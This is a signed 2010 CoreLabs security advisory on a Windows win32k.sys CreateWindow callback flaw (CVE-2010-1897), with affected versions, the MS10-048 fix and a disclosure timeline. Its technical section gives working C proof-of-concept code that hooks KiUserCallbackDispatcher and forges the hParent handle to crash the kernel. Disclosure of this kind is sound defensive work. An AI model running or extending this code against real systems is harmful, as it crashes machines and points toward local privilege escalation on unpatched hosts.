-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
      Core Security Technologies - CoreLabs Advisory
           http://corelabs.coresecurity.com/

Microsoft Windows CreateWindow function callback vulnerability

1. *Advisory Information*

Title: Microsoft Windows CreateWindow function callback vulnerability
Advisory Id: CORE-2010-0623
Advisory URL:
[http://www.coresecurity.com/content/microsoft-windows-createwindow-function-callback-bug]
Date published: 2010-08-10
Date of last update: 2010-08-09
Vendors contacted: Microsoft
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Input validation error [CWE-20]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2010-1897
Bugtraq ID: 42206

3. *Vulnerability Description*

A crash due to an invalid read in the Windows kernel can be reliably
leveraged into privileged code execution resulting in a privilege
escalation local vulnerability. This happens because special values of
'hParent' where not sufficiently taken into account when patching
'xxxCreateWindowsEx' on MS010-032[1].

4. *Vulnerable packages*

At least all supported versions of Windows were reported by Microsoft
to be vulnerable:

   . Windows 7
   . Windows Vista
   . Windows Server 2008 R2
   . Windows Server 2008
   . Microsoft Windows XP
   . Microsoft Windows Server 2003

5. *Non-vulnerable packages*

   . Windows 7 with MS10-048
   . Windows Vista with MS10-048
   . Windows Server 2008 R2 with MS10-048
   . Windows Server 2008 with MS10-048
   . Microsoft Windows XP with MS10-048
   . Microsoft Windows Server 2003 with MS10-048

6. *Vendor Information, Solutions and Workarounds*

See Microsoft security bulletin at
[http://go.microsoft.com/fwlink/?LinkId=194552]

7. *Credits*

This vulnerability was discovered by Nicolas Economou from Core
Security Technologies.

8. *Technical Description / Proof of Concept Code*

There is a bug in the 'xxxCreateWindowEx' Windows kernel function,
located in win32k.sys. This function addresses memory with a
user-supplied (via a callback) window pseudo-handle (the 'hParent'
parameter). This bug can be exploited by surreptitiously registering a
callback or "hook" that will cleverly modify parameters passed by the
kernel into userland that are then reused when returning to kernel
from the callback.

In normal execution when the 'CreateWindow' is called from userspace,
the 'NtUserCreateWindowEx' kernel function is executed, the
'xxxCreateWindowEx' is next in the kernel-side call stack. The later
function then checks that the callback functions (or "hooks") where
properly set and calls 'xxxCallHook' which then starts the dispatch
into userland of the registered callback functions.

The problem resides in the mechanism used to pass parameters back to
the process creating the window, like for example the aforementioned
'hParent' parameter. These parameters are passed via the stack into
userspace, and reused by the kernel after the callback function is
executed. If the callback function resets the 'hParent' parameter to
pseudo-handle values like '0xffffffff' or '0xfffffffe' the kernel
crashes (likely because validation of handle values was already done
and was not being re-verified after executing untrusted userland code).

The following code reliably crashes a fully patched version of Windows
XP 32 bits when executed as an unprivileged user. On version
5.1.2600.5976 of win32k.sys the crash occurs on '0xbf832763'
('xxxCreateWindowEx') when reading from unmapped memory ('test byte
ptr [eax+0x1c],0x8'). The value of 'eax' on the crash is '0xfffffffe',
the supplied vulnerable 'hParent' value.

/-----
#include <windows.h>
#include <stdio.h>

#define asm __asm

///////////////////////////////////////////////////////////////////////////

void *KiUserCallbackDispatcher;

///////////////////////////////////////////////////////////////////////////

//__declspec ( naked ) void handler ( void );
void seter ( unsigned int * );
BOOL CALLBACK my_callback ( int , WPARAM , LPARAM );

///////////////////////////////////////////////////////////////////////////

char *trampoline = "\x68"               // "push"
                   "\x12\x34\x56\x78"   // "handler address"
                   "\xc3";              // "ret"

///////////////////////////////////////////////////////////////////////////

__declspec ( naked ) void handler ( void )
{
//  asm int 3

  asm pushad
  asm push esp
  asm call seter
  asm add esp,4
  asm popad

/* The first 3 "KiUserCallbackDispatcher" instructions */
  asm add esp,0x4
  asm pop edx
  asm mov eax,fs:[0x18]

/* Returning to the normal code */
  asm push dword ptr [ KiUserCallbackDispatcher ]
  asm add dword ptr [esp],0x0a
  asm ret
}

///////////////////////////////////////////////////////////////////////////

void seter ( unsigned int *base )
{
  unsigned int *p = ( unsigned int * ) base;
  static int time = 1;

/* If it's the correct call */
  if ( time == 1 )
  {
  /* Searching a known argument */
    while ( 1 )
    {
    /* If it's the interesting value */
      if ( *p == 0x00cf0000 )
      {
      /* If it's the hParent to be modified */
        if ( p [ 4 ] == 0 )
        {
        /* Writing the magic argument */
          p [ 4 ] = 0xfffffffe;      /* <<<<<<<< BUG <<<<<<<< */

        /* Closing the door */
          time ++;
        }

       /* Leaving */
        break;
      }
      else
      {
        p ++;
      }
    }
  }
  else
  {
    time ++;
  }

}

///////////////////////////////////////////////////////////////////////////

BOOL CALLBACK my_callback ( int algo , WPARAM wparam , LPARAM lparam )
{
  return ( FALSE );
}

///////////////////////////////////////////////////////////////////////////

int main ( int argc , char *argv [] )
{
  unsigned int nbytes;
  unsigned int oldp;
  HHOOK hook;

/* Resolving the KiUserCallbackDispatcher address */
  KiUserCallbackDispatcher = GetProcAddress ( GetModuleHandle (
"ntdll.dll" ) , "KiUserCallbackDispatcher" );
  printf ( "%x\n" , KiUserCallbackDispatcher );

/* Changing the privileges */
  VirtualProtect ( KiUserCallbackDispatcher , 1 ,
PAGE_EXECUTE_READWRITE , &oldp );

/* Fixing the trampoline */
  * ( ( unsigned int * ) &trampoline [ 1 ] ) = ( unsigned int * ) handler;

/* Patching the KiUserCallbackDispatcher */
  WriteProcessMemory ( ( HANDLE ) -1 , ( void * )
KiUserCallbackDispatcher , ( void * ) trampoline , 6 , ( DWORD * )
&nbytes );

/* Enabling the kernel callbacks */
  hook = SetWindowsHookEx ( WH_SHELL , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );
  hook = SetWindowsHookEx ( WH_GETMESSAGE , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );
  hook = SetWindowsHookEx ( WH_CBT , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );

/* Creating a window */
  printf ( "Creating a Window ...\n" );
  CreateWindow ( "Edit" , "Title" , WS_OVERLAPPEDWINDOW , 0 , 0 , 20 ,
30 , NULL , NULL , NULL , NULL );
  printf ( "waiting the BSOD ...\n" );

  return ( 0 );
}
- -----/

9. *Report Timeline*

. 2010-06-15:
Initial notification to the vendor. Core indicates that the patch from
MS10-032 does not seem to fix the problem and send a PoC that work on
fully patched systems. Asks Microsoft to determine if it is a newly
found vulnerability or simply a quality issue with the patch issued on
n June's Patch Tuesday.

. 2010-06-16:
Vendor acknowledges notification and says that the product team will
look into the issue.

. 2010-06-17:
Vendor asks for a stacktrace and crash dump file to confirm that
they're reproducing the same issue.

. 2010-06-15:
Core sends stacktrace and crash dump and asks to confirm that the bug
could be reproduced with the PoC sent earlier.

. 2010-06-17:
Vendor confirms that the bug has been reproduced. Can't determine if
it is a new bug, a variant of an existing one or an incomplete fix but
expects to have more information by the 20th or 21st at the latest.

. 2010-06-23:
Update from the vendor (email sent previously bounced). The issue has
been determined to be a variant of CVE-2010-0485. It will be addressed
as a new bug and assigned a different CVE ID. Although the crash comes
from the same vector (a window handle returned by a user mode windows
hook callback) the bug is in a different function than the original
issue and occurs due to a different, previously unknown, issue with
the window handle that the original fix does not address. A solid
timeline for general availability of patches is not yet available. The
July 2010 Patch Tuesday day is mentioned as tentative but the patch
release may slip to August.

. 2010-06-23:
Core says that its analysis coincides with the vendor's and therefore
it will treat the issue as a new vulnerability assigning
CORE-2010-0623 to the corresponding security advisory. The discoverer
estimated that the issue is very likely to be exploitable. Publication
is tentatively scheduled for July 13th, 2010 but may be postponed
based on a firm commitment from MSRC and indication that the fix is
lined up for testing. Core mentions that it is very likely that
vulnerability research vendors have already found this issue and quite
possible that exploits are already being developed. Should the
information become public by a third-party Core will promptly publish
its security advisory and notify the vendor.

. 2010-07-23:
Core asks Microsoft to confirm that the patch has been positively
rescheduled to the August patch Tuesday, since no communications where
received on the last month and July's patch Tuesday is due. Core also
informs that reliable exploitation of this bug had been achieved and
restates that August should be a final date because this vulnerability
has probably been already discovered by any with technical knowledge
to reverse engineer MS010-032. Information on affected platforms is
also asked for to Microsoft.

. 2010-07-23:
Microsoft confirms that the patch will be issued in August 10th, for
all supported versions of Microsoft Windows.

. 2010-08-04:
Core asks Microsoft for data regarding their future security bulletin
in order to include it in the vendor section of this advisory.

. 2010-08-04:
Microsoft replies with the data Core asked for, and mentions that, if
possible, they would like to see an advisory draft. Microsoft also
asks for confirmation on credits for the acknowledgement section of
their report.

. 2010-08-04:
Core replies with a draft of this advisory and a minor correction
regarding an accent mark on the credits for the acknowledgement section.

. 2010-08-09:
Core sends a more polished draft for the advisory.

. 2010-08-10:
Microsoft acknowledges the advisory draft and the minor correction
regarding the accent mark.

. 2010-08-10:
Microsoft Security Bulletin MS10-048 is published.

. 2010-08-10:
Advisory CORE-2010-0623 is published.

10. *References*

[1] Microsoft Security Bulletin MS10-032
[http://www.microsoft.com/technet/security/bulletin/ms10-032.mspx]

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: [http://corelabs.coresecurity.com/].

12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].

13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: GnuPT v3.6.3
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAkxhpQ0ACgkQyNibggitWa3Q7gCfVgpuM7KDIIZ30RhJ9zPCOhl+
37IAoLMnTLUuZbvGpDlpjqmft5z0AFZ+
=ECTt
-----END PGP SIGNATURE-----